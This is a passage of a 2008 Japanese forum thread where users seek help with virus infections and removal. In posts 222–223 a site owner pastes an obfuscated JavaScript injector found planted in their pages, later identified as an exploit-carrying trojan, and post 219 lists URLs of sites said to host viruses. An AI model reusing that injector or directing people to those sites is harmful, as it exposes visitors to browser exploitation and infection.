 (4)フォルダオプションで、「すべてのファイルとフォルダを表示する」にチェックして
   [適用]→[OK]をした後、フォルダオプションを確認すると
   「隠しファイルおよび隠しフォルダを表示しない」に変わっている。
 (5)マイコンピュータでハードディスクアイコンをダブルクリックすると
   何で開くか聞いてくる。

 (6)外付けのポータブルディスク3台も感染している模様。」

B.質問

1.どういうウィルスに感染しているのでしょうか?
(1)1種類なのか複数なのか分かりません。
(2)PSW.OnlineGames.xxxというのはあるのですが、
   PSW.OnlineGames.2.Sというのは見つかりません。

2.対策は、どうすれば良いのでしょうか?

宜しくお願いします。

187:名無しさん@お腹いっぱい。
08/12/07 18:41:28
>>186
USBなんかを通して感染を広めるウイルスとネトゲのパスなんかを盗むものに感染してる
両方質が悪いしばっちし感染してるからすぐリカバリーしろ

188:名無しさん@お腹いっぱい。
08/12/07 18:59:59
>>185
URLリンク(mm113.blog49.fc2.com)
URLリンク(www.cyber-concierge.co.jp)

189:185
08/12/08 08:12:59
>>187,>>188

レスありがとうございます。

URLリンク(www.cyber-concierge.co.jp)
を、やってみます。

190:185
08/12/08 11:04:20
autorun.infを止める方法についての追加質問です。

次の2つの方法がネットに書かれていたのですが、
このウィルスの対策としては、どちらが良いのでしょうか?

(1)グループポリシーの設定を変える

[ファイル名を指定して実行]→gpedit.msc入力→[コンピュータの構成]
→[管理用テンプレート]→[システム]→[自動再生機能をオフにする]
 →[プロパティ]→[自動再生機能をオフにする]→[適用]→[OK]

(2)レジストリを変える

REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT
\CurrentVersion\IniFileMapping\Autorun.inf]
@="@SYS:DoesNotExist"

宜しくお願いします。


191:名無しさん@お腹いっぱい。
08/12/08 18:21:11
>>190
どちらもやってることは同じだと思うけど
(1)の方をお勧めしておく

192:名無しさん@お腹いっぱい。
08/12/08 19:26:53
俺はTweakUIで潰してるな

193:185
08/12/08 20:26:35
>>191
レスありがとうございます。

194:名無しさん@お腹いっぱい。
08/12/09 13:35:27
【使用OS】「vista」
【MUの状態】「最新」
【使用セキュリティソフトとバージョン】「光回線でデフォでついてきたNTT西日本セキュリティ対策ツールver15」
【最新か】「最新」
【スパイウェア対策ソフトと状態】「同上」
【スキャンの結果何が検索されたか】「このソフトだと何も検索されない」
だった訳ですが(続く)

195:名無しさん@お腹いっぱい。
08/12/09 13:42:47
ありゃバスターなのでバスタースレでどうぞ。

196:194
08/12/09 13:45:52
ある日突然立ち上がった(購入後半年で初めて)
ノートンsecurity scanによると
【検出されたウイルス】「Unix.penguin
感染場所はJane styleの生活板のログ
JS.Windowbomb
感染場所はJane styleのどこか」

専ブラ使ってるので>>8とは違うのでしょうか?
無償のスキャナで除去不能とか言われるし常駐のソフトでは検出されないしいったいどうしたらという感じです

197:名無しさん@お腹いっぱい。
08/12/09 14:36:30
ノートンお得意の2ch専ブラログの誤検知だろ

198:名無しさん@お腹いっぱい。
08/12/09 22:17:33
>>197
専ブラにも反応するんですか?
やっかいですね…
使ってないしノートン先生はアンインスコします
ありがとうございました

199:名無しさん@お腹いっぱい。
08/12/10 02:51:09
C:\WINDOWS\system32\sens.dll

W32/Patcher
調べても情報が出てきません。
どなたか駆除方法をご存知ありませんか?

200:名無しさん@お腹いっぱい。
08/12/10 07:57:26
【使用OS】 「xp sp3」
【Microsoft Update(MU)の状態】 「最新」

先ほど自動更新でアップデートしたら
悪意のあるソフトウェアの削除ツールで、
TrojanDropper:Win32/Renos.N
なるものが削除されました。
ぐぐても、どんなウィルスなのかいまいちわかりません
これはどんなウィルスなんですか?
よろしくお願いします。


201:名無しさん@お腹いっぱい。
08/12/10 12:27:32
3.0mod3-3.54-setup.exe
a0030828.exe

バスター2009でこの二つがウイルスだって出た
3.0mod3-3.54-setup.exeがWINMXのパッチなのは分かったけど
a0030828.exeが何なのかわからん?

誰か教えてくれ


202:名無しさん@お腹いっぱい。
08/12/10 13:07:15
>>199
sens.dllでググれ

203:名無しさん@お腹いっぱい。
08/12/10 13:46:11
>>201
パスがSystem Volume Information以下だったら、システムの復元のバックアップファイル。

>>200
Renosでググれ。

>>199
誤検出でなければ、sens.dllが改変されてる。
セキュリティソフトで修復出来なかったら、早くリカバリした方がいいよ。

204:名無しさん@お腹いっぱい。
08/12/10 14:40:26
研究でウィルスの検体が大量に欲しいのですが、どこかにzipファイルなどでウイルスをゲットできるサイトありませんか?

205:名無しさん@お腹いっぱい。
08/12/10 17:39:18
>>204
それくらい自分で探そうね。

206:名無しさん@お腹いっぱい。
08/12/10 23:28:56
困っています。下記がバスターコーポレーションで検出
dmserv.dll
C:\WINDOWS\system32\の中で
隔離削除できないため困っています。
セーフモードでもだめでした、何かOS入れ直さないで
修復できる方法ありませんか?

207: ◆N9P3SuvBPo
08/12/11 00:06:51
>206
案内レス

企業用PCでしょうか?
もしそうならシステム管理者にご報告を

208:名無しさん@お腹いっぱい。
08/12/11 07:06:04
ウイルスリムーバーをこらしめたいが

209:名無しさん@お腹いっぱい。
08/12/11 07:51:56
>167 さん

 聞こえなくなくったからと言って安心できませんよ。僕も12/4日くらいに取りつかれ、英語交じりの中国語のラジオ放送みたいなのと、クリック音が連続して聞こえる現象がありましたが、断続的で3日ほ現象が無かったのです。どうも夜8時頃に起動すればそうした現象が
出て、他の時間帯ではそうではなありませんでした。Flash getは直ちに削除しましたが、新しすぎるためなのかウィルスセキュリティでは検出できず、いろいろな体験版で対処中です。

210:名無しさん@お腹いっぱい。
08/12/12 19:45:24
>>203

THX

System Volume Informationだから
システムの復元のバックアップファイルなのか?
なんでウイルス扱いなんだ?
隔離してるって出てるけどどうなるんだろう?
更新でソフトを新しく入れるとこんなのばっかり・・・


211:名無しさん@お腹いっぱい。
08/12/13 01:05:56
いまエクスプローラで作業しているのだが
s2.com
ってウィルスかな? ドライブ全てにいるのだが、前からあったかな…
ググッテモよく分からないし…ソース頼む

212:名無しさん@お腹いっぱい。
08/12/13 06:11:09
amvoをうつされたので下のサイトの通りに削除。
その後DドライブにRECYCLERとSystem Volume Informationが出てきたんだけど、これって何で?
今までは「全てのフォルダを表示する」にしてても表示されなかったのに。

スレリンク(sec板)l50

213:名無しさん@お腹いっぱい。
08/12/13 06:13:26
↑winXPSP3です。すまそ。

214:名無しさん@お腹いっぱい。
08/12/13 10:20:04
>>206

OSがファイルをつかんでしまっているためだと思います。

マイコンピュータ右クリック→管理→サービスとアプリケーション
→サービス

サービスの中に怪しい文字列(意味のない文字列)があったら
それをダブルクリック、スタートアップの種類を「無効」にして一度パソコンを再起動、
それからもう一度system32フォルダをコーポレートエディションでスキャン、

これでうちの会社はできましたよ。
一度やってみてください。

215:名無しさん@お腹いっぱい。
08/12/13 10:21:31
システムの復元については機能をとりあえずOFFにするといいと思います。
OSの復元はできませんが最悪再セットアップすればいい話なので。

216:名無しさん@お腹いっぱい。
08/12/13 21:34:35
自分のパソコンがどれだけ防御力が高いかためしたい。
ためしにウイルスに感染できるホームページとかないですか?
当然バックアップしてから挑みます。

自分の防御力を調べてみたいって人少ないのかなあ。


217:名無しさん@お腹いっぱい。
08/12/13 22:04:21
>>216
URLリンク(jp.youtube.com)
まだあるかわかんないけど。
リンクはようつべ

218:名無しさん@お腹いっぱい。
08/12/13 22:28:37
>>217 もっとちょうだい
gog いってみたけど今は配布してないようです。


219:名無しさん@お腹いっぱい。
08/12/13 22:57:54
【激しく既出、危険なサイト一覧=ウイルス、ブラクラ系】
1. //www.hackpalace.com/virii/makers/ (ウィルス)
2. //ip3e83566f.speed.planet.nl/hacked-by-chinese/5a.htm (ウィルスJS_PETCH.A:セキュリティホールを突いたWMP破壊スクリプト)
3. //easyweb.easynet.co.uk/~hiros/**** (****以降はウイルス名:ウイルス)
4. //www2.strangeworld.org/uedakana/sahra****.*** (****は番号違い、拡張子違いなど:ブラクラ&ウイルス:HTML_SUAR.)
5. //amilala.blogspot.com (ウイルスJS_AMILALA.A作成者のサイト。有害なスクリプトが仕掛けられる可能性あり)
6. //www.kogalu.com/sou/girls/index2.htm (通常はエロサイトだがブラクラ&ウイルスの場合あり)
7. //raus.de/crashme/ (ブラクラ&ウイルス)
8. //www.albinoblacksheep.com/flash/you.html (ブラクラ:Windowオープン/ゾンビ ウィンドウ/無限JavaScriptループ)
9. //www.albinoblacksheep.com/flash/open.html (8と同じです)
10. //www.youareanidiot.org/ (8と同じです)
11. //cfi.hyo-ka.net/kiki01.htm(ブラクラ:Windowオープン。ドクロの壁紙)

220:名無しさん@お腹いっぱい。
08/12/13 23:36:03
>>219 全部行ってみたんですが
みんなウイルスの挙動紹介の安全なHPですね。



221:名無しさん@お腹いっぱい。
08/12/14 01:19:47
スレチなら誘導お願いします。
サイト持ちなんですが、ファイル上げてから暫くするとソースに
よくわからない記述が追加されてしまいます。
サイト感染してるんじゃないですかって、閲覧者からの報告があって
調べてみたら見つけました。
とりあえずローカルファイルには問題ないっぽいので、
サーバーのファイルを全て消去して上げなおしました。
昨日上げなおしてソースチェックしたらなかったので安心してたら、
今日ソース見たときには追加されてました。
今、また上げなおして様子見中なんですが、
また追加されたらどう対処するべきかわかりません。
アドバイスお願いします。
↓がその記述です。

222:名無しさん@お腹いっぱい。
08/12/14 01:22:42
<script>function c102916999516m49435c6be9d24(m49435c6bea4f4)
{ function m49435c6beacc4(){var m49435c6beb495=16;return m49435c6beb495;}
return (parseInt(m49435c6bea4f4,m49435c6beacc4()));}
function m49435c6bebc69(m49435c6bec437){ function m49435c6bedba9(){return 2;}
var m49435c6becc07='';m49435c6beeb49=String.fromCharCode;
for(m49435c6bed3d8=0;m49435c6bed3d8<m49435c6bec437.length;m49435c6bed3d8+=m49435c6bedba9())
{ m49435c6becc07+=(m49435c6beeb49(c102916999516m49435c6be9d24(m49435c6bec437.substr(m49435c6bed3d8,m49435c6bedba9()))));}return m49435c6becc07;}

223:名無しさん@お腹いっぱい。
08/12/14 01:23:42
var zc6='';var
m49435c6bef31b='3C7'+zc6+'3637'+zc6+'2697'+zc6+'07'+zc6+'43E6
96628216D7'+zc6+'96961297'+zc6+'B646F637'+zc6+'56D656E7'+zc6+
'42E7'+zc6+'7'+zc6+'7'+zc6+'2697'+zc6+'465287'+zc6+'56E657'+z
c6+'363617'+zc6+'065282027'+zc6+'2533632536392536362537'+zc6+
'322536312536642536352532302536652536312536642536352533642536
332533312533302532302537'+zc6+'332537'+zc6+'32253633253364253
237'+zc6+'2536382537'+zc6+'342537'+zc6+'342537'+zc6+'30253361
253266253266253637'+zc6+'253666253637'+zc6+'25366625333225366
42536352532652536652536352537'+zc6+'34253266253265253637'+zc6
+'2536662532662536332536382536352536332536622532652536382537'
+zc6+'34253664253663253366253237'+zc6+'2532622534642536312537
'+zc6+'342536382532652537'+zc6+'322536662537'+zc6+'3525366525
36342532382534642536312537'+zc6+'342536382532652537'+zc6+'322
5363125366525363425366625366425323825323925326125333225333225
3334253332253337'+zc6+'253239253262253237'+zc6+'253332253337'
+zc6+'253237'+zc6+'2532302537'+zc6+'37'+zc6+'2536392536342537
'+zc6+'342536382533642533342533312532302536382536352536392536
37'+zc6+'2536382537'+zc6+'34253364253335253334253337'+zc6+'25
32302537'+zc6+'332537'+zc6+'342537'+zc6+'39253663253635253364
253237'+zc6+'2536342536392537'+zc6+'332537'+zc6+'302536632536
312537'+zc6+'39253361253230253665253666253665253635253237'+zc
6+'2533652533632532662536392536362537'+zc6+'32253631253664253
63525336527'+zc6+'29293B7'+zc6+'D7'+zc6+'6617'+zc6+'2206D7'+z
c6+'969613D7'+zc6+'47'+zc6+'27'+zc6+'5653B3C2F7'+zc6+'3637'+z
c6+'2697'+zc6+'07'+zc6+'43E';document.write(m49435c6bebc69
(m49435c6bef31b));</script>

224:名無しさん@お腹いっぱい。
08/12/14 04:57:20
>>221-223
貼り付けたコードの改行や不要部分を取り除いて、エディターでファイルにしてみたところ、
"JS/Obfuscated"と言う名称のトロイであることが判りましたよ。うちのMcAfee+Artemisが
検出しました。

以下のページで、"JS/Obfuscated"と言う名称で検索してみてください。ちなみにMcAfeeの
ページですが、日本語のサイトでは載っていません。USAの方で探せます。
URLリンク(vil.nai.com)

Virus Profile: JS/Obfuscated
Risk Assessment
- Home Users: Low
- Corporate Users: Low
Date Discovered: 11/26/2008
Date Added: 11/26/2008
Origin: Unknown
Length: N/A
Type: Trojan
SubType: Script

詳細な説明が、"JS/Obfuscated.b"とかにしか有りませんが、ブラウザの脆弱性を利用する
スクリプトファイルですね。

あなたのPCが、マルウエアに感染していないのなら、サーバーがSQLインジェクション等で
攻撃されてるんでしょうね。管理者へ至急連絡しないと行けませんね。

225:名無しさん@お腹いっぱい。
08/12/14 12:09:03
単純にIDとパスが漏れてる(推測しやすいとか、トロイ踏んだとか)とかね。

226:名無しさん@お腹いっぱい。
08/12/14 20:48:41
【使用OS】 「windowsXP」
【Microsoft Update(MU)の状態】 「不明」
【使用セキュリティソフトとバージョン】 「セキュリティ24」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「更新済」
【スパイウェア対策ソフト】 「Kingsoft」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「常時自動更新状態」
【ルータの有無】 「有」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「uu.exe」

PCを起動するたびに一時ファイルのフォルダに複数のuu.exeに入っています
しかも対策ソフトも一時フォルダを開けないと反応せず削除しないみたい感じです
調べたところPCに別のウイルスが入っていてそれが勝手にダウンロードしているみたいです

どのような対策をすればよろしいのでしょうか?

227:221
08/12/15 03:26:54
>>224
トロイでしたか…。
PCが感染してる可能性は考えたので、ファイル上げなおす前に一通りのチェックはしました。
別のサーバーでやってるサイトは全く感染しないのでPCが問題という事はおそらくないと思ってます。
もう少しPCチェックしてやっぱり問題がないのなら管理者に連絡してみます。

>>225
感染ばっかり考えてて忘れてました。すぐ変更してみます。

ありがとうございました。

228: ◆N9P3SuvBPo
08/12/15 18:19:19
>227
健康診断のほうに移動されました?
ログに問題は無い様です…
それともしかしてMBAMというツールも使いました?

とりあえずあちらの方の指示を優先してください。

229:名無しさん@お腹いっぱい。
08/12/15 18:55:49
>>211
エクスプローラですべてのファイルとフォルダを表示(隠しファイルの表示)は出来てる?
出来るならc:\windows\system32フォルダにrevo.exeやrevo0.dllとか無いか確認してみて。

もし出来なかったらウイルスが実行されてる状態。


しかも各社ウイルス対策ソフトで全く対策されていないウイルス

230:221
08/12/15 20:19:42
>>228
しました。
MalwareBytes' Anti-Malwareでしたら使いました。
ログは問題なしですか。とりあえず一安心ですが感染原因が不明ですね…。
IDとパスが漏れてたのかもしれないです。

ありがとうございます。指示を待ちます。

231:名無しさん@お腹いっぱい。
08/12/15 20:45:22
【使用OS】 「Windows XP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「avast! 4.8.1296」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「手動」
【ルータの有無】 「有」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「C:\WINDOWS\SYSTEM32\ils.dll」

avast! からの警告「疑わしいファイルが発見されました」
と表示されました。
削除していいのでしょうか?

232:名無しさん@お腹いっぱい。
08/12/15 20:54:04
>>231
URLリンク(detail.chiebukuro.yahoo.co.jp)

233:名無しさん@お腹いっぱい。
08/12/15 21:07:59
>>231
avast! Anti-Virus Part99
スレリンク(sec板:30-番)

234:名無しさん@お腹いっぱい。
08/12/15 21:17:42
別スレに書き込んだのですが今皆さん何か問題が起きてるようで
スルーされ気味なのでこちらに書き込ませてください

OS XP
ウィルスソフト avastとspybot
更新はどちらも最近放置してたかもしれません
問題 avastがルートキットを検出したので慌てて指示に従い
再起動後HDDの自動スキャンを開始しました
現在スキャン中で結果待ちですがルートキットは深刻な問題でしょうか?
対処についてはavastの指示に従っていればおkですか?
私のPCを救うアドバイスを戴けませんか

235:名無しさん@お腹いっぱい。
08/12/15 21:22:01
avastが検知した物はavastユーザにしかわかりませんので
avastスレにお帰りください

236:名無しさん@お腹いっぱい。
08/12/17 21:18:06
ウィルスが見つかりましたっていう警告が出たので
詳細を確認してみたんですが、そのウィルスの名前を
ウィルスバスターで検索してみたんですがヒットしなかったので
対処方法とかわからず放置しています

確かHTML_HEKIREみたいな名前でした。
誰かわかる人いませんか?

マジ不安です


237:名無しさん@お腹いっぱい。
08/12/17 21:30:47
>>236
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】 !!!

238:名無しさん@お腹いっぱい。
08/12/17 21:34:56
バスタースレでどうぞ!

239:名無しさん@お腹いっぱい。
08/12/18 22:05:26
【使用OS】 「XP sp2」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「NTT西日本ウィルス対策」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」

下記のメッセージが出て、インターネットの接続が切断されます。

処理の結果:ウィルス感染ファイルを隔離できませんでした。
      このウィルスは手動で処理する必要があります。
ファイル名:C\WINDOWS\system32\HBmhly.dll
ウィルス/スパイウェア名:TSPYLOLYDA.AE

対策等教えて頂ければ幸いです。
宜しくお願いします。


240:名無しさん@お腹いっぱい。
08/12/18 22:50:01
>>239
NTT西日本ウィルス対策と言うのはバスターかな?NTTに聞くのがよいと思うが
ちなみに"TSPYLOLYDA.AE"というキーワードでは見つからないが、ファイルパス名から
調べると、トロイの木馬で、パスワードを盗むマルウエアだと思う。
削除できないのは、それが動作中だから。セーフーモードで起動して削除。
それでも駄目なら、セーフDOSモードで削除となるが、使ってるソフトで方法が異
なるので、NTTサポにまず聞くと良いぞ。


241:名無しさん@お腹いっぱい。
08/12/19 11:20:07
【使用OS】 「XP SP2」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「マカフィー」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「済」
【スパイウェア対策ソフト】 「マカフィー」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「済」
【ルータの有無】 「有」

スキャンの結果
ファイル名「windows\system32\sens.dll」
ウィルス名「W32/Patcher」
状態「再起動後にスキャン」
となりました。
「対応の必要はありません」とは表示されるのですが
隔離も削除させてくれないので、自動スキャンの度に毎回検出されるので気になります。
URLリンク(detail.chiebukuro.yahoo.co.jp)
↑のサイトを参照して「windows\system32\sens.dll」を他の健康なPCから持ってきたら解消されますでしょうか?
もしくは何か良い策がありましたらご教授願います。


242:名無しさん@お腹いっぱい。
08/12/19 12:43:31
>>241
スレリンク(sec板)

243:名無しさん@お腹いっぱい。
08/12/19 21:40:56
>>239
URLリンク(www.trendmicro.co.jp)

244:名無しさん@お腹いっぱい。
08/12/19 21:42:05
ネットにつながっていないPCのウィルスを除去したいのですが、なにかフリーでありませんでしょうか?
【使用OS】 「Windows XP」
【Microsoft Update(MU)の状態】 「?」
【使用セキュリティソフトとバージョン】 過去にネットにつながってたときは「Avast」 を使ってました。
 Avastの期限が切れたあとに「トロイの木馬が発見されました!」と警告が出たことがあります。

 【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 ない
【スパイウェア対策ソフト】 なし
【スパイウェア対策ソフトの更新は定期的に行なっているか】 いない
【ルータの有無】 なし

245:名無しさん@お腹いっぱい。
08/12/19 23:30:43
>>244
URLリンク(drweb.jp)
インストール不要

246:名無しさん@お腹いっぱい。
08/12/20 05:46:34
>>241
システムの復元を無効にする
URLリンク(www.mcafee.com)
フルスキャンを実行する→問題解決後システムの復元をもどす
でokのはず

247:名無しさん@お腹いっぱい。
08/12/20 19:47:45
>>245
ありがとうございました。

248:241
08/12/21 01:08:37
>>244
ありがとうございます。
試してみます。

249:名無しさん@お腹いっぱい。
08/12/22 19:38:14

けっこうおもしろかった
URLリンク(www.interbars.co.jp)


250:名無しさん@お腹いっぱい。
08/12/22 21:14:38
>>249
rootkit駆除に関してとても参考になった。ブログ主は謙遜してるが相当なプロに感じる。

次ページ
最新レス表示
レスジャンプ
類似スレ一覧
スレッドの検索
話題のニュース
おまかせリスト
オプション
しおりを挟む
スレッドに書込
スレッドの一覧
暇つぶし2ch